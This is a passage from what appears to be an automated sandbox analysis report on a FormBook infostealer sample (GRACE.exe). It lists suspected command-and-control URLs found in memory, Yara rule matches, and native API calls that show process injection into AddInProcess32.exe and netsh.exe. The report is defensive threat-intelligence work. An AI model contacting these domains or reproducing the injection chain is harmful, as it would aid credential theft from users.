Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.sterlworldshop.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.sterlworldshop.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.sterlworldshop.com/jqc/www.internetmarkaching.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.sterlworldshop.comReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.szyulics.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.szyulics.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.szyulics.com/jqc/M
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.szyulics.comReferer:
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.wlw-hnlt.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.wlw-hnlt.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.wlw-hnlt.com/jqc/www.novergi.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.wlw-hnlt.comReferer:
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: GRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: GRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/
Source: GRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmp String found in binary or memory: https://www.google.comT

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00419D60 NtCreateFile, 10_2_00419D60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00419E10 NtReadFile, 10_2_00419E10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00419E90 NtClose, 10_2_00419E90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00419F40 NtAllocateVirtualMemory, 10_2_00419F40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00419D5D NtCreateFile, 10_2_00419D5D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00419E0B NtReadFile, 10_2_00419E0B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00419E8A NtClose, 10_2_00419E8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00419F3A NtAllocateVirtualMemory, 10_2_00419F3A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379910 NtAdjustPrivilegesToken,LdrInitializeThunk, 10_2_01379910
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013799A0 NtCreateSection,LdrInitializeThunk, 10_2_013799A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379860 NtQuerySystemInformation,LdrInitializeThunk, 10_2_01379860
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379840 NtDelayExecution,LdrInitializeThunk, 10_2_01379840
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013798F0 NtReadVirtualMemory,LdrInitializeThunk, 10_2_013798F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379A20 NtResumeThread,LdrInitializeThunk, 10_2_01379A20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379A00 NtProtectVirtualMemory,LdrInitializeThunk, 10_2_01379A00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379A50 NtCreateFile,LdrInitializeThunk, 10_2_01379A50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379540 NtReadFile,LdrInitializeThunk, 10_2_01379540
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013795D0 NtClose,LdrInitializeThunk, 10_2_013795D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379710 NtQueryInformationToken,LdrInitializeThunk, 10_2_01379710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013797A0 NtUnmapViewOfSection,LdrInitializeThunk, 10_2_013797A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379780 NtMapViewOfSection,LdrInitializeThunk, 10_2_01379780
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379660 NtAllocateVirtualMemory,LdrInitializeThunk, 10_2_01379660
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013796E0 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_013796E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379950 NtQueueApcThread, 10_2_01379950
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013799D0 NtCreateProcessEx, 10_2_013799D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379820 NtEnumerateKey, 10_2_01379820
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0137B040 NtSuspendThread, 10_2_0137B040
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013798A0 NtWriteVirtualMemory, 10_2_013798A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379B00 NtSetValueKey, 10_2_01379B00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0137A3B0 NtGetContextThread, 10_2_0137A3B0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379A10 NtQuerySection, 10_2_01379A10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379A80 NtOpenDirectoryObject, 10_2_01379A80
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0137AD30 NtSetContextThread, 10_2_0137AD30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379520 NtWaitForSingleObject, 10_2_01379520
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379560 NtWriteFile, 10_2_01379560
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013795F0 NtQueryInformationFile, 10_2_013795F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379730 NtQueryVirtualMemory, 10_2_01379730
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0137A710 NtOpenProcessToken, 10_2_0137A710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0137A770 NtOpenThread, 10_2_0137A770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379770 NtSetInformationFile, 10_2_01379770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379760 NtOpenProcess, 10_2_01379760
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379FE0 NtCreateMutant, 10_2_01379FE0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379610 NtEnumerateValueKey, 10_2_01379610
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379670 NtQueryInformationProcess, 10_2_01379670
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379650 NtQueryValueKey, 10_2_01379650
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013796D0 NtCreateKey, 10_2_013796D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739A50 NtCreateFile,LdrInitializeThunk, 17_2_03739A50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739910 NtAdjustPrivilegesToken,LdrInitializeThunk, 17_2_03739910
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037399A0 NtCreateSection,LdrInitializeThunk, 17_2_037399A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739860 NtQuerySystemInformation,LdrInitializeThunk, 17_2_03739860
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739840 NtDelayExecution,LdrInitializeThunk, 17_2_03739840
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739710 NtQueryInformationToken,LdrInitializeThunk, 17_2_03739710
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739FE0 NtCreateMutant,LdrInitializeThunk, 17_2_03739FE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739780 NtMapViewOfSection,LdrInitializeThunk, 17_2_03739780
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037396E0 NtFreeVirtualMemory,LdrInitializeThunk, 17_2_037396E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037396D0 NtCreateKey,LdrInitializeThunk, 17_2_037396D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739540 NtReadFile,LdrInitializeThunk, 17_2_03739540
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037395D0 NtClose,LdrInitializeThunk, 17_2_037395D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739B00 NtSetValueKey, 17_2_03739B00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0373A3B0 NtGetContextThread, 17_2_0373A3B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739A20 NtResumeThread, 17_2_03739A20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739A10 NtQuerySection, 17_2_03739A10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739A00 NtProtectVirtualMemory, 17_2_03739A00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739A80 NtOpenDirectoryObject, 17_2_03739A80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739950 NtQueueApcThread, 17_2_03739950
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037399D0 NtCreateProcessEx, 17_2_037399D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0373B040 NtSuspendThread, 17_2_0373B040
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739820 NtEnumerateKey, 17_2_03739820
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037398F0 NtReadVirtualMemory, 17_2_037398F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037398A0 NtWriteVirtualMemory, 17_2_037398A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0373A770 NtOpenThread, 17_2_0373A770
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739770 NtSetInformationFile, 17_2_03739770
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739760 NtOpenProcess, 17_2_03739760
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739730 NtQueryVirtualMemory, 17_2_03739730
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0373A710 NtOpenProcessToken, 17_2_0373A710
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037397A0 NtUnmapViewOfSection, 17_2_037397A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739670 NtQueryInformationProcess, 17_2_03739670
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739660 NtAllocateVirtualMemory, 17_2_03739660
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739650 NtQueryValueKey, 17_2_03739650
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739610 NtEnumerateValueKey, 17_2_03739610
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739560 NtWriteFile, 17_2_03739560
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0373AD30 NtSetContextThread, 17_2_0373AD30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739520 NtWaitForSingleObject, 17_2_03739520
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037395F0 NtQueryInformationFile, 17_2_037395F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D19D60 NtCreateFile, 17_2_00D19D60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D19E90 NtClose, 17_2_00D19E90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D19E10 NtReadFile, 17_2_00D19E10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D19D5D NtCreateFile, 17_2_00D19D5D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D19E8A NtClose, 17_2_00D19E8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D19E0B NtReadFile, 17_2_00D19E0B
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02633FAC CreateProcessAsUserW, 0_2_02633FAC
Detected potential crypto function
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02630040 0_2_02630040
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02638A48 0_2_02638A48
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02630A28 0_2_02630A28
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02633810 0_2_02633810
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02634340 0_2_02634340
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02631D50 0_2_02631D50
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02636158 0_2_02636158
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02639668 0_2_02639668
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02638A38 0_2_02638A38
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02633800 0_2_02633800
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02630007 0_2_02630007
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02630A19 0_2_02630A19
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026378F0 0_2_026378F0
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026354A8 0_2_026354A8
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026340BD 0_2_026340BD
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02635499 0_2_02635499
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02631D40 0_2_02631D40
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02636149 0_2_02636149
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02635920 0_2_02635920
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_0263590F 0_2_0263590F
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02636BF8 0_2_02636BF8
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026FEA58 0_2_026FEA58
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026FD328 0_2_026FD328
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026FC830 0_2_026FC830
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026F6638 0_2_026F6638
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026F2E01 0_2_026F2E01
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026F9D60 0_2_026F9D60
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026F45E8 0_2_026F45E8
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026FB4A0 0_2_026FB4A0
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_06CE2680 0_2_06CE2680
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_06CE0670 0_2_06CE0670
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_06CE84B8 0_2_06CE84B8
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_06CE1E89 0_2_06CE1E89
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_06CECE68 0_2_06CECE68
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_06CE0663 0_2_06CE0663
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_06CE2670 0_2_06CE2670
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_06CECE58 0_2_06CECE58
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_06CE7B38 0_2_06CE7B38
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_06CE7B30 0_2_06CE7B30
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_06CED978 0_2_06CED978
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00401030 10_2_00401030
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0041D8D2 10_2_0041D8D2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0041E197 10_2_0041E197
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0041D313 10_2_0041D313
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00402D87 10_2_00402D87
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00402D90 10_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00409E40 10_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0041D63C 10_2_0041D63C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00409E3F 10_2_00409E3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0041DF97 10_2_0041DF97
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0041DFAA 10_2_0041DFAA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00402FB0 10_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_008E2050 10_2_008E2050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01354120 10_2_01354120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133F900 10_2_0133F900
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013599BF 10_2_013599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A830 10_2_0135A830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F1002 10_2_013F1002
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0140E824 10_2_0140E824
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013620A0 10_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134B090 10_2_0134B090
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_014028EC 10_2_014028EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_014020A8 10_2_014020A8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01402B28 10_2_01402B28
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135AB40 10_2_0135AB40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136EBB0 10_2_0136EBB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013E23E3 10_2_013E23E3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F03DA 10_2_013F03DA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013FDBD2 10_2_013FDBD2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136ABD8 10_2_0136ABD8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013EFA2B 10_2_013EFA2B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4AEF 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_014022AE 10_2_014022AE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01330D20 10_2_01330D20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01401D55 10_2_01401D55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01402D07 10_2_01402D07
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_014025DD 10_2_014025DD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01362581 10_2_01362581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F2D82 10_2_013F2D82
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134D5E0 10_2_0134D5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134841F 10_2_0134841F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013FD466 10_2_013FD466
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F4496 10_2_013F4496
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0140DFCE 10_2_0140DFCE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01401FF1 10_2_01401FF1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01356E30 10_2_01356E30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013FD616 10_2_013FD616
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01402EF7 10_2_01402EF7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371AB40 17_2_0371AB40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C2B28 17_2_037C2B28
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037B03DA 17_2_037B03DA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037BDBD2 17_2_037BDBD2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372EBB0 17_2_0372EBB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037AFA2B 17_2_037AFA2B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C22AE 17_2_037C22AE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03714120 17_2_03714120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036FF900 17_2_036FF900
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371A830 17_2_0371A830
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037CE824 17_2_037CE824
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037B1002 17_2_037B1002
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C28EC 17_2_037C28EC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037220A0 17_2_037220A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C20A8 17_2_037C20A8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0370B090 17_2_0370B090
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C1FF1 17_2_037C1FF1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037CDFCE 17_2_037CDFCE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03716E30 17_2_03716E30
